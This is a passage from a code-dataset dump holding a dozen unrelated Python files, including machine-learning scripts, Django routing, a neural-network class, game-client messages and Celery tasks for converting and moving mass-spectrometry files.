placeholder for the 784 dim vector\nx = tf.placeholder(tf.float32, [None, 784])\n\n# Weights and Biases Variables\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\n\n# Defining the model\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\n# placeholder for cross entropy (how far away from the truth vector)\ny_ = tf.placeholder(tf.float32, [None, 10])\n\n# Actual Cross Entropy function\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n\n# Training! Gradian Descent Algorithm\ntrain_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n# varible init\ninit_op = tf.global_variables_initializer()\n\n# LOAD Training DATA\n\nimg_train_path = './data/fashion-mnist_train.csv'\ntrain_label_bin, train_feature_bin = data_bin(img_train_path)\n\nimg_test_path = './data/fashion-mnist_test.csv'\ntest_label_bin, test_feature_bin = data_bin(img_train_path)\n\n# Start a new session\nwith tf.Session() as sess:\n sess.run(init_op)\n\n # Training step\n for _ in range(5):\n idx = np.random.randint(len(train_feature_bin), size=100)\n batch_xs = train_feature_bin[idx,]\n batch_ys = train_label_bin[idx,]\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n # Prediction\n correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n # Turns correct prediction into accuracy\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n # Test!\n print(sess.run(accuracy, feed_dict={x: test_feature_bin, y_: test_label_bin}))\n","repo_name":"gtarpenning/ml-testing","sub_path":"img-tensorflow/test-scripts/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"30635544940","text":"from django.conf import settings\nfrom django.conf.urls.defaults import *\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\n\"\"\"\nfeeds = {\n 'latestpages': LatestPages,\n}\n\nsitemaps = {\n 'wiki': Wiki,\n}\n\"\"\"\n\nurlpatterns = patterns('',\n url(r'^$', include('Home.urls')),\n url(r'^Publication/', include('Publication.urls')),\n url(r'^Recent_Updates/', include('Recent_Updates.urls')),\n url(r'^Paper_Download/', include('Paper_Download.urls')),\n url(r'^Contact_Us/', include('Contact_Us.urls')),\n url(r'^tinymce/', include('tinymce.urls')),\n url(r'^admin/(.*)', admin.site.root),\n url(r'^%s(?P.*)$' % settings.MEDIA_URL[1:], \n 'django.views.static.serve', {\"document_root\": settings.MEDIA_ROOT}),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login', {'template_name': 'login.html'}),\n url(r'^accounts/logout/$', include('accounts.urls')),\n url(r'^accounts/register/$', 'sphene.community.views.register', name = 'sph_register'),\n (r'^board/', include('sphene.sphboard.urls')),\n (r'^(?Ptest/(?P\\w+))/board/', include('sphene.sphboard.urls')),\n (r'^(?Ptest/(?P\\w+))/wiki/', include('sphene.sphwiki.urls')),\n (r'^wiki/', include('sphene.sphwiki.urls'), { 'urlPrefix': 'wiki', 'groupName': 'Sphene' }),\n (r'^static/sphene/(.*)$', 'django.views.static.serve', {'document_root': settings.ROOT_PATH + '/communitytools/static/sphene' }),\n (r'^static/(.*)$', 'django.views.static.serve', {'document_root': settings.ROOT_PATH + '/static' }),\n (r'^site_media/(.*)$', 'django.views.static.serve', {'document_root': '/home/kahless/dev/python/diamanda/media'}), \n (r'^accounts/register/(?P[a-zA-Z/\\+0-9=]+)/$', 'sphene.community.views.register_hash'),\n)\n\n","repo_name":"sunilpatelmca/dishnine","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27520403978","text":"\"\"\"\nStatus Effect Lists\n~~~~~~~~~~~~~~~~~~~\n\"\"\"\nfrom nari.types import Timestamp\nfrom nari.types.event import Event\nfrom nari.types.classjoblevel import ClassJobLevel\nfrom nari.types.actor import Actor\nfrom nari.types.status import StatusEffect\n\n\nclass StatusList(Event): # pylint: disable=too-few-public-methods\n \"\"\"Represents a player Actor status list\n\n :param timestamp: The timestamp of the event\n :type timestamp: Timestamp\n :param class_job_level: The actor's class, job, and level\n :type class_job_level: ClassJobLevel\n :param target_actor: The target actor that has status effects\n :type target_actor: Actor\n :param status_effects: A list of status effects\n :type status_effects: list[StatusEffect]\n \"\"\"\n def __init__(self, *,\n timestamp: Timestamp,\n class_job_level: ClassJobLevel,\n target_actor: Actor,\n status_effects: list[StatusEffect],\n ):\n super().__init__(timestamp)\n self.class_job_level = class_job_level\n self.target_actor = target_actor\n self.status_effects = status_effects\n\n def __repr__(self):\n return ''\n\n\nclass StatusListBasic(Event): # pylint: disable=too-few-public-methods\n \"\"\"Represents a simplified status list as opposed to ``StatusList``\n\n :param timestamp: The timestamp of the event\n :type timestamp: Timestamp\n :param target_actor: The target actor that has status effects\n :type target_actor: Actor\n :param status_effects: A list of status effects\n :type status_effects: list[StatusEffect]\n \"\"\"\n def __init__(self, *,\n timestamp: Timestamp,\n target_actor: Actor,\n status_effects: list[StatusEffect],\n ):\n super().__init__(timestamp)\n self.target_actor = target_actor\n self.status_effects = status_effects\n\n def __repr__(self):\n return ''\n","repo_name":"xivlogs/nari","sub_path":"nari/types/event/statuslist.py","file_name":"statuslist.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"39099487553","text":"from river import datasets\nfrom river import metrics\nfrom river.evaluate import progressive_val_score\n\nfrom river import optim\nfrom river import compose\nfrom river import facto\n\n\ndef evaluate(model):\n X_y = datasets.MovieLens100K()\n metric = metrics.MAE() + metrics.RMSE()\n _ = progressive_val_score(X_y, model, metric, print_every=25_000, show_time=True, show_memory=True)\n\n\ndef debug(model):\n for x, _ in datasets.MovieLens100K():\n report = model.debug_one(x)\n print(report)\n break\n\n\ndef split_genres(x):\n genres = x['genres'].split(', ')\n return {f'genre_{genre}': 1 / len(genres) for genre in genres}\n\n\ndef bin_age(x):\n if x['age'] <= 18:\n return {'age_0-18': 1}\n elif x['age'] <= 32:\n return {'age_19-32': 1}\n elif x['age'] < 55:\n return {'age_33-54': 1}\n else:\n return {'age_55-100': 1}\n\n\ndef debug_fm():\n fm_params = {\n 'n_factors': 10,\n 'weight_optimizer': optim.SGD(0.025),\n 'latent_optimizer': optim.SGD(0.05),\n 'sample_normalization': False,\n 'l1_weight': 0.,\n 'l2_weight': 0.,\n 'l1_latent': 0.,\n 'l2_latent': 0.,\n 'intercept': 3,\n 'intercept_lr': .01,\n 'weight_initializer': optim.initializers.Zeros(),\n 'latent_initializer': optim.initializers.Normal(mu=0., sigma=0.1, seed=73),\n }\n\n regressor = compose.Select('user', 'item')\n regressor += (\n compose.Select('genres') |\n compose.FuncTransformer(split_genres)\n )\n regressor += (\n compose.Select('age') |\n compose.FuncTransformer(bin_age)\n )\n regressor |= facto.FMRegressor(**fm_params)\n evaluate(regressor)\n debug(regressor)\n\n\ndef debug_ffm():\n dataset = (\n ({'user': 'Alice', 'item': 'Superman', 'time': .12}, 8),\n ({'user': 'Alice', 'item': 'Terminator', 'time': .13}, 9),\n ({'user': 'Alice', 'item': 'Star Wars', 'time': .14}, 8),\n ({'user': 'Alice', 'item': 'Notting Hill', 'time': .15}, 2),\n ({'user': 'Alice', 'item': 'Harry Potter ', 'time': .16}, 5),\n ({'user': 'Bob', 'item': 'Superman', 'time': .13}, 8),\n ({'user': 'Bob', 'item': 'Terminator', 'time': .12}, 9),\n ({'user': 'Bob', 'item': 'Star Wars', 'time': .16}, 8),\n ({'user': 'Bob', 'item': 'Notting Hill', 'time': .10}, 2)\n )\n model = facto.FFMRegressor(\n n_factors=10,\n intercept=5,\n seed=42,\n )\n\n for x, y in dataset:\n model = model.learn_one(x, y)\n\n print(model.predict_one({'user': 'Bob', 'item': 'Harry Potter', 'time': .14}))\n print(model.debug_one({'user': 'Bob', 'item': 'Harry Potter', 'time': .14}))\n\n\ndef debug_fwfm():\n dataset = (\n ({'user': 'Alice', 'item': 'Superman'}, 8),\n ({'user': 'Alice', 'item': 'Terminator'}, 9),\n ({'user': 'Alice', 'item': 'Star Wars'}, 8),\n ({'user': 'Alice', 'item': 'Notting Hill'}, 2),\n ({'user': 'Alice', 'item': 'Harry Potter '}, 5),\n ({'user': 'Bob', 'item': 'Superman'}, 8),\n ({'user': 'Bob', 'item': 'Terminator'}, 9),\n ({'user': 'Bob', 'item': 'Star Wars'}, 8),\n ({'user': 'Bob', 'item': 'Notting Hill'}, 2)\n )\n model = facto.FwFMRegressor(\n n_factors=10,\n intercept=5,\n seed=42,\n )\n\n for x, y in dataset:\n model = model.learn_one(x, y)\n\n print(model.predict_one({'Bob': 1, 'Harry Potter': 1}))\n print(model.debug_one({'Bob': 1, 'Harry Potter': 1}))\n\n\ndef debug_hofm():\n dataset = (\n ({'user': 'Alice', 'item': 'Superman', 'time': .12}, 8),\n ({'user': 'Alice', 'item': 'Terminator', 'time': .13}, 9),\n ({'user': 'Alice', 'item': 'Star Wars', 'time': .14}, 8),\n ({'user': 'Alice', 'item': 'Notting Hill', 'time': .15}, 2),\n ({'user': 'Alice', 'item': 'Harry Potter ', 'time': .16}, 5),\n ({'user': 'Bob', 'item': 'Superman', 'time': .13}, 8),\n ({'user': 'Bob', 'item': 'Terminator', 'time': .12}, 9),\n ({'user': 'Bob', 'item': 'Star Wars', 'time': .16}, 8),\n ({'user': 'Bob', 'item': 'Notting Hill', 'time': .10}, 2)\n )\n model = facto.HOFMRegressor(\n degree=3,\n n_factors=10,\n intercept=5,\n seed=42,\n )\n\n for x, y in dataset:\n _ = model.learn_one(x, y)\n\n print(model.predict_one({'user': 'Bob', 'item': 'Harry Potter', 'time': .14}))\n print(model.debug_one({'user': 'Bob', 'item': 'Harry Potter', 'time': .14}))\n\n\nif __name__ == '__main__':\n debug_hofm()\n","repo_name":"nakamasato/ml-training","sub_path":"river/examples/fm-for-datalens/debug_check.py","file_name":"debug_check.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"10739589398","text":"from colorama import Style, Fore, Back\r\n_ALL_COLORS_ = [Fore.RED,Fore.BLUE,Fore.GREEN,Fore.YELLOW,\r\n Fore.CYAN,Fore.MAGENTA,Fore.WHITE,Fore.BLACK\r\n]\r\n\r\ntry:\r\n number = int(input(\"===>\"))\r\nexcept ValueError:\r\n print('Enter a integer not a string.') \r\n number = int(input(\"===>\"))\r\n\r\n \r\ndef binary(num):\r\n code = \"\"\r\n while num>0:\r\n remainder = num%2\r\n code += str(remainder)\r\n print(f\"{_ALL_COLORS_[0]}2 {_ALL_COLORS_[6]}|{_ALL_COLORS_[1]} {num} {_ALL_COLORS_[6]}|{_ALL_COLORS_[3]} {remainder}\")\r\n num = num//2\r\n binarycode = list(code)\r\n binarycode.reverse()\r\n binarycode = str(binarycode)\r\n binarycode = binarycode.strip(\"[\")\r\n binarycode = binarycode.strip(\"]\")\r\n binarycode = binarycode.replace(\" \",\"\")\r\n binarycode = binarycode.replace(\"'\",\"\")\r\n binarycode = binarycode.replace(\",\",\"\")\r\n print(\"Binary number is \",binarycode) \r\nbinary(number)\r\nagain = input('Wanna Run Again Y/N') \r\nwhile again != 'N' or 'n':\r\n number = int(input(\"===>\"))\r\n binary(number)\r\n again = input('Wanna Run Again Y/N: ') \r\n if again == 'N' or 'n':\r\n print('Thanku For using')\r\n break\r\n","repo_name":"Dhruv117/binaryconverter","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"37432416451","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 7/21/2022 11:09 AM\n# @Author : jonas pan\n# @Email : jonas.pan@signify.com\n# @File : main\n# ---------------------\nimport logging\nimport coloredlogs\nimport os\nimport sys\nimport gui_main_window\nfrom PySide6.QtWidgets import QApplication, QStyleFactory\n\n\nclass Main:\n\n @staticmethod\n def setup_logging(level=logging.DEBUG, log_folder='log', filename='mainwindow.log'):\n if not os.path.exists(log_folder):\n os.mkdir(log_folder)\n log_filename = None\n if filename is not None and log_folder is not None:\n log_filename = log_folder + os.sep + filename\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n log_format = '%(asctime)s - %(levelname)5s - %(lineno)4s - %(filename)18s - %(message)s'\n logging.basicConfig(filename=log_filename, level=level, format=log_format)\n if log_filename is not None:\n console = logging.StreamHandler(stream=sys.stdout)\n console.setLevel(logging.getLogger().level)\n console.setFormatter(logging.Formatter(log_format))\n logging.getLogger().addHandler(console)\n coloredlogs.install(level=level, fmt=log_format, milliseconds=True)\n\n @classmethod\n def run(cls):\n cls.setup_logging()\n app = QApplication(sys.argv)\n tmp = gui_main_window.MainWindow()\n app.setStyle(QStyleFactory.create(\"windowsvista\"))\n tmp.show()\n try:\n sys.exit(app.exec())\n except Exception as e:\n logging.error(e)\n\n\nif __name__ == '__main__':\n Main.run()\n","repo_name":"pjmbox/trailing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29462893238","text":"import numpy as np\n\nfrom DataSet import DataSet\n\n\nclass NeuralNetwork:\n def __init__(self, structure, f, fDeriv, w=None):\n '''\n constructor\n :param structure: size of each layer, structure[0] is input layer size (including bias), and structure[-1] is output layer size\n :param f: activation function\n :param fDeriv: activation function derivative. it should take f(x) as an input and returns derivative of f(x) as output\n :param w: weight matrix\n '''\n self.n = structure\n self.L = len(structure) # Number of layers\n self.a = self.networkShapedMatrix() # a[i][j] is the value of jth node in the ith layer\n self.f_v = np.vectorize(f) # vectorizing f to apply it to a vector instead of just a scalar\n self.fDeriv = fDeriv\n self.fDeriv_v = np.vectorize(fDeriv) # vectorizing fDeriv\n if (w == None):\n self.randInitWeights()\n else:\n self.w = w\n self.errors = [] # for logging of cost\n\n def networkShapedMatrix(self):\n '''\n\n :return: 2D Matrix. mat[i][j] is the jth node in the ith layer.\n '''\n return [np.zeros(shape=length, dtype=np.float64) for length in self.n]\n\n def randInitWeights(self):\n '''\n initializes all weight matrices [1, L) randomly with values in range [0, 1)\n :return: void\n '''\n self.w = [np.zeros(1)] + [np.random.rand(self.n[l], self.n[l - 1]) for l in range(1, self.L)]\n # self.w = [np.zeros(1)] + [np.ones(shape=(self.n[l], self.n[l - 1])) for l in range(1, self.L)]\n\n def learn(self, ds: DataSet, EPOCHS: int, alpha: float):\n '''\n learns weight w on dataset ds\n :param ds: training set\n :param EPOCHS: number of epochs to train on\n :param alpha: learning rate\n :return:\n '''\n self.errors.append(self.MSE(ds))\n for i in range(EPOCHS):\n for [x, y] in ds:\n self.forward(x)\n self.backward(y, alpha)\n self.errors.append(self.MSE(ds))\n print(\"Error at iteration \" + str(i) + \" = \" + str(self.errors[-1]))\n\n def SE(self, y_pred, y_actual):\n '''\n\n :param y_pred: predicted output vector\n :param y_actual: actual output vector\n :return: summation of squared pairwise difference of elements of both vectors\n '''\n return np.sum((y_pred - y_actual)**2)\n\n def MSE(self, ds):\n '''\n Mean square error\n :param ds:\n :return:\n '''\n total = 0\n for [x, y] in ds:\n total += self.SE(self.forward(x), y)\n total /= 2 * ds.m\n return total\n\n def forward(self, x: np.ndarray):\n '''\n updates self.a to hold value of forward propagating x\n :param x: 1D input feature vector of size self.n[0]\n :return: 1D output vector of size self.n[-1]\n '''\n self.a[0] = x\n for i in range (1, self.L):\n self.a[i] = self.f_v(np.matmul(self.w[i], self.a[i - 1]))\n return self.a[-1]\n\n def backward(self, y: np.ndarray, alpha):\n '''\n updated weights on w\n :param y: 1D output vector of size self.n[-1]\n :return: delta matrix\n '''\n d = self.networkShapedMatrix()\n d[-1] = (self.a[-1] - y) * self.fDeriv_v(self.a[-1])\n for h in range (self.L - 2, 0, -1):\n d[h] = np.matmul(self.w[h + 1].transpose(), d[h + 1]) * self.fDeriv_v(self.a[h])\n '''\n explanation of above line:\n np.matmul(...) will return an array of same size as d[h]. each element of the array is resultant from the dot product d[h + 1] array with each column of self.w[h + 1]\n then this array is element-wise multiplied with an array containing the derivative of each element of a[h]\n '''\n # for j in range(self.n[h]):\n # d[h][j] = np.sum(d[h + 1] * self.w[h + 1][:, j]) * self.fDeriv(self.a[h][j])\n\n for h in range(1, self.L):\n self.w[h] -= alpha * self.makeMat(d[h], self.a[h - 1])\n return d\n\n def makeMat(self, v1: np.ndarray, v2: np.ndarray):\n '''\n generates matrix out of product of v1, v2\n :param v1: 1D np array\n :param v2: 1D np array\n :return: matrix where mat[i][j] is v1[i] * v2[j]\n '''\n return np.matmul(v1.reshape((v1.shape[0], 1)), v2.reshape((1, v2.shape[0])))","repo_name":"MostafaOmar98/neural-network","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8452911952","text":"import re\nimport ktrain\nimport parameter\nimport pandas as pd\nfrom ktrain import vision as vis\nfrom PIL import ImageFile\nimport tensorflow as tf\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\n\n\n# Function to filter asset_id from filename\ndef filter_asset_id(original_list, pattern=r'_(\\d+)_'):\n output_list = []\n for element in original_list:\n p = re.compile(pattern)\n r = p.search(element)\n output_list.append(int(r.group(1)))\n return output_list\n\n\npattern = r'_([^/]+)_\\d+_.jpg$'\n\np = re.compile(pattern)\nr = p.search('_0.01_1099561093123_.jpg')\nprint(r.group(1))\n\ndata_dir = parameter.ImageAttributes_ResNet50.dir\n\n# Split dataset to training and test data\n(train_data, test_data, preproc) = vis.images_from_fname(data_dir,\n pattern = pattern,\n is_regression = True,\n random_state = 42)\n\n# Get pretrained model from ktrain\npretrained_model = vis.image_regression_model('pretrained_resnet50',\n train_data = train_data,\n val_data = test_data,)\n\n# Remove the last two layers of the pretrained model\npretrained_model = Model(pretrained_model.input,\n pretrained_model.layers[-3].output)\n\n# Add two dense layer and create model\n# Give output layer specific name\nmodel = Sequential()\nmodel.add(pretrained_model)\nmodel.add(Dense(512, activation=\"relu\", name=\"attribute_layer\"))\nmodel.add(Dense(1, activation=\"relu\"))\n\nprint(model.summary())\n\n# Get learner\nlearner = ktrain.get_learner(model = model,\n train_data = test_data,\n val_data = train_data,\n batch_size = 128)\n\n# Compile learner\nlearner.model.compile(optimizer=Adam(learning_rate=1e-4),\n loss=tf.keras.losses.MeanAbsoluteError(),\n metrics=[tf.keras.metrics.MeanAbsoluteError()])\n\n# Train model\nImageFile.LOAD_TRUNCATED_IMAGES = True\nlearner.fit_onecycle(1e-4, 2)\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\nlearner.freeze(15)\nlearner.fit_onecycle(1e-4, 2)\n\n# Get predictor\npredictor = ktrain.get_predictor(learner.model, preproc)\n\n# Create predictor with specific layer as output and run\npredictor2 = Model(inputs=predictor.model.input,\n outputs=predictor.model.get_layer('attribute_layer').output)\nImageFile.LOAD_TRUNCATED_IMAGES = True\nattributes_train = predictor2.predict(train_data)\nattributes_test = predictor2.predict(test_data)\n\n# Store output attributes in dataframe\ndf_train = pd.DataFrame(attributes_train)\ndf_test = pd.DataFrame(attributes_test)\n\n# Use function to filter asset_id from filename\n# Also store asset_ids in dataframes\ntrain_data_list = filter_asset_id(list(train_data.filenames))\ndf_train[\"asset_id\"] = train_data_list\ntest_data_list = filter_asset_id(list(test_data.filenames))\ndf_test[\"asset_id\"] = test_data_list\n\n# Combine output attributes and asset ids\ndf_ResNet = pd.concat([df_train, df_test])\ndf_ResNet.head()\n\n# Load textual dataset\ndf_textual = pd.read_csv(parameter.ImageAttributes_ResNet50.textual_dataset_dir)\n\n# Merge datasets on asset_id, drop empty rows and store file\ndf = pd.merge(df_textual, df_ResNet, on=['asset_id'], how=\"left\")\ndf = df.dropna()\ndf.to_csv(parameter.ImageAttributes_ResNet50.final_dataset_dir)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"BuecAle/NftPricePrediction","sub_path":"model/ImageAttributes_ResNet50.py","file_name":"ImageAttributes_ResNet50.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"19128540193","text":"import heapq\ndef solve(applicantsize, apartmentsize, diff):\n heapq.heapify(applicantsize)\n heapq.heapify(apartmentsize)\n count = 0\n while applicantsize and apartmentsize:\n applicant, apartment = heapq.heappop(applicantsize), heapq.heappop(apartmentsize)\n if abs(applicant - apartment) <= diff:\n count += 1\n else:\n if apartment > applicant:\n heapq.heappush(apartmentsize, apartment)\n else:\n heapq.heappush(applicantsize, applicant)\n return count\n\nif __name__ == '__main__':\n n, m, k = map(int, input().split())\n applicantsize = list(map(int, input().split()))\n apartmentsize = list(map(int, input().split()))\n print(solve(applicantsize, apartmentsize, k))","repo_name":"Semeriuss/Data-Structures-and-Algorithms","sub_path":"csef problems/apartments.py","file_name":"apartments.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24566404600","text":"\"\"\"Plot forecast vs target.\"\"\"\n\n\nimport pandas as pd\n\n\nfrom walmart_sales.constants import FEATURES_WINDOW\nfrom walmart_sales.utils import add_weeks\n\n\ndef plot_forecast_vs_target(\n df: pd.DataFrame,\n store: int,\n dept: int,\n forecast_week_str: str,\n features_window: int = FEATURES_WINDOW,\n) -> None:\n \"\"\"Plot forecast vs target.\n\n Args:\n df: dataframe with lags, target, and forecast.\n store: store number.\n dept: department number.\n forecast_week_str: week at which forecast was\n obtained, e.g., '2012-09-07'.\n features_window: number of lags in the data.\n\n Raises:\n ValueError: if there is no such department forecasted\n at a given week in data.\n \"\"\"\n forecast_week = pd.Timestamp(forecast_week_str)\n sub_df = df[\n (df.Store == store)\n & (df.Dept == dept)\n & (df.forecast_week == forecast_week)\n ]\n if len(sub_df) == 0:\n raise ValueError(\"No such department in a dataset.\")\n max_horizon = sub_df.horizon.max()\n vis_df = pd.DataFrame(\n list(\n sub_df.iloc[0][(f\"lag_{i}\" for i in range(features_window, 0, -1))]\n )\n + list(sub_df[\"target\"]),\n columns=[\"target\"],\n ).fillna(0)\n vis_df[\"forecast\"] = sub_df.pred.set_axis(\n [i for i in range(features_window, features_window + max_horizon)]\n )\n vis_df[\"forecast\"] = vis_df[\"forecast\"].fillna(vis_df[\"target\"])\n vis_df = vis_df.set_axis(\n pd.date_range(\n add_weeks(forecast_week, -features_window + 1),\n periods=len(vis_df),\n freq=\"w\",\n )\n )\n title = (\n f\"Store {store}\\nDepartment {dept}\\n\"\n f\"forecast obtained in {forecast_week.strftime('%Y-%m-%d')}\"\n )\n vis_df[[\"forecast\", \"target\"]].plot(\n title=title, xlabel=\"date\", ylabel=\"weekly sales\"\n )\n","repo_name":"astraszab/walmart-sales","sub_path":"src/walmart_sales/visualization/plot_forecast_vs_target.py","file_name":"plot_forecast_vs_target.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44016705149","text":"import constants\nimport platform\nimport json\n\ndef get_client_info():\n client_info = {}\n client_info_msg[\"type\"] = constants.CLIENT_INFO\n client_info_msg[\"language\"] = \"python\"\n client_info_msg[\"languageVersion\"] = platform.python_version()\n client_info_msg[\"operatingSystem\"] = platform.system()\n client_info_msg[\"operatingSystemVersion\"] = platform.release()\n client_info_msg[\"clientVersion\"] = \"1.0\"\n return json.dumps(client_info_msg)\n\n\ndef default_game_settings():\n game_settings = {}\n game_settings[\"maxNoofPlayers\"] = 5\n game_settings[\"startSnakeLenth\"] = 1\n game_settings[\"timeInMsPerTick\"] = 250\n game_settings[\"obstaclesEnabled\"] = True\n game_settings[\"foodEnabled\"] = True\n game_settings[\"headToTailConsumes\"] = True\n game_settings[\"tailConsumeGrows\"] = False\n game_settings[\"addFoodLikelihood\"] = 15\n game_settings[\"removeFoodLikelihood\"] = 5\n game_settings[\"spontaneousGrowthEveryNWorldTick\"] = 3\n game_settings[\"trainingGame\"] = False\n game_settings[\"pointsPerLength\"] = 1\n game_settings[\"pointsPerFood\"] = 2\n game_settings[\"pointsPerCausedDeath\"] = 5\n game_settings[\"pointsPerNibble\"] = 10\n game_settings[\"noofRoundsTailProtectedAfterNibble\"] = 3\n\n return game_settings\n\ndef register_move(next_move, incoming_data):\n register_move_msg = {}\n register_move_msg[\"type\"] = constants.REGISTER_MOVE\n register_move_msg[\"direction\"] = next_move\n register_move_msg[\"gameTick\"] = incoming_data[\"gameTick\"]\n register_move_msg[\"receivingPlayerId\"] = incoming_data[\"receivingPlayerId\"]\n register_move_msg[\"gameId\"] = incoming_data[\"gameId\"]\n \n return json.dumps(register_move_msg)\n\ndef start_game():\n start_game_msg = {}\n start_game_msg[\"type\"] = constants.START_GAME\n\n return json.dumps(start_game_msg)\n\ndef register_player(name):\n reg_msg = {}\n reg_msg[\"type\"] = constants.REGISTER_PLAYER_MESSAGE_TYPE\n reg_msg[\"playerName\"] = name\n reg_msg[\"gameSettings\"] = default_game_settings()\n\n return json.dumps(reg_msg)\n","repo_name":"Hagesjo/snakebot-client-python","sub_path":"messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7115521310","text":"import os\nimport shutil\nimport subprocess\nfrom urllib.parse import urljoin\n\nfrom django.urls import reverse\nfrom celery import shared_task\nfrom celery.exceptions import MaxRetriesExceededError\n\nfrom kantele import settings\nfrom jobs.post import update_db, taskfail_update_db\nfrom analysis.tasks import create_runname_dir, prepare_nextflow_run, run_nextflow, transfer_resultfile, check_in_transfer_client\nfrom rawstatus.tasks import calc_md5, delete_empty_dir\n\n# Updating stuff in tasks happens over the API, assume no DB is touched. This\n# avoids setting up auth for DB\n\n\n@shared_task(bind=True, queue=settings.QUEUE_NXF)\ndef run_convert_mzml_nf(self, run, params, raws, ftype_name, nf_version, profiles, **kwargs):\n postdata = {'client_id': settings.APIKEY, 'task': self.request.id}\n rundir = create_runname_dir(run, run['dset_id'], 'convert_mzml', run['timestamp'])\n params, gitwfdir, stagedir = prepare_nextflow_run(run, self.request.id, rundir, {'--raws': raws}, [], params)\n try:\n run_outdir = run_nextflow(run, params, rundir, gitwfdir, profiles, nf_version)\n except subprocess.CalledProcessError as e:\n # FIXME report stderr with e\n errmsg = 'OUTPUT:\\n{}\\nERROR:\\n{}'.format(e.stdout, e.stderr)\n taskfail_update_db(self.request.id, errmsg)\n raise RuntimeError('Error occurred converting mzML files: '\n '{}\\n\\nERROR MESSAGE:\\n{}'.format(rundir, errmsg))\n transfer_url = urljoin(settings.KANTELEHOST, reverse('jobs:mzmlfiledone'))\n resultfiles = {}\n outpath = os.path.split(rundir)[-1]\n outfullpath = os.path.join(settings.SHAREMAP[run['dstsharename']], outpath)\n try:\n os.makedirs(outfullpath, exist_ok=True)\n except (OSError, PermissionError):\n taskfail_update_db(self.request.id, 'Could not create output directory for analysis results')\n raise\n token = False\n for raw in raws:\n token = check_in_transfer_client(self.request.id, token, ftype_name)\n fname = os.path.splitext(raw[2])[0] + '.mzML'\n srcpath = os.path.join(run_outdir, fname)\n fdata = {'md5': calc_md5(srcpath), 'file_id': raw[3], 'newname': fname}\n transfer_resultfile(outfullpath, outpath, srcpath, run['dstsharename'],\n fdata, transfer_url, token, self.request.id)\n # FIXME first check tstate so no dup transfers used?\n # TODO we're only reporting task finished in this POST call, but there is no specific route\n # for that.\n url = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n update_db(url, json=postdata)\n shutil.rmtree(rundir)\n shutil.rmtree(stagedir)\n\n\n@shared_task(bind=True, queue=settings.QUEUE_STORAGE)\ndef rename_top_level_project_storage_dir(self, projsharename, srcname, newname, proj_id, sf_ids):\n \"\"\"Renames a project, including the below experiments/datasets\"\"\"\n msg = False\n projectshare = settings.SHAREMAP[projsharename]\n srcpath = os.path.join(projectshare, srcname)\n dstpath = os.path.join(projectshare, newname)\n if not os.path.exists(srcpath):\n msg = f'Cannot move project name {srcname} to {newname}, does not exist'\n elif not os.path.isdir(srcpath):\n msg = f'Cannot move project name {srcname} to {newname}, {srcname} is not a directory'\n elif os.path.exists(dstpath):\n msg = f'Cannot move project name {srcname} to {newname}, already exists'\n if msg:\n taskfail_update_db(self.request.id, msg)\n raise RuntimeError(msg)\n try:\n os.rename(srcpath, dstpath)\n except NotADirectoryError:\n taskfail_update_db(self.request.id, msg=f'Failed renaming project {srcpath} is a directory '\n f'but {dstpath} is a file')\n raise\n except Exception:\n taskfail_update_db(self.request.id, msg='Failed renaming project for unknown reason')\n raise\n postdata = {'proj_id': proj_id, 'newname': newname, 'sf_ids': sf_ids,\n 'task': self.request.id, 'client_id': settings.APIKEY}\n url = urljoin(settings.KANTELEHOST, reverse('jobs:renameproject'))\n update_db(url, json=postdata)\n\n@shared_task(bind=True, queue=settings.QUEUE_FILE_DOWNLOAD)\ndef rsync_dset_servershare(self, dset_id, srcsharename, srcpath, dstsharename, fns, upd_sf_ids):\n '''Uses rsync to copy a dataset to other servershare. E.g in case of consolidating\n projects to a certain share, or when e.g. moving to new storage unit. Files are rsynced\n one at a time, to avoid rsyncing files removed from dset before running this job,\n and avoiding files added to dset updating 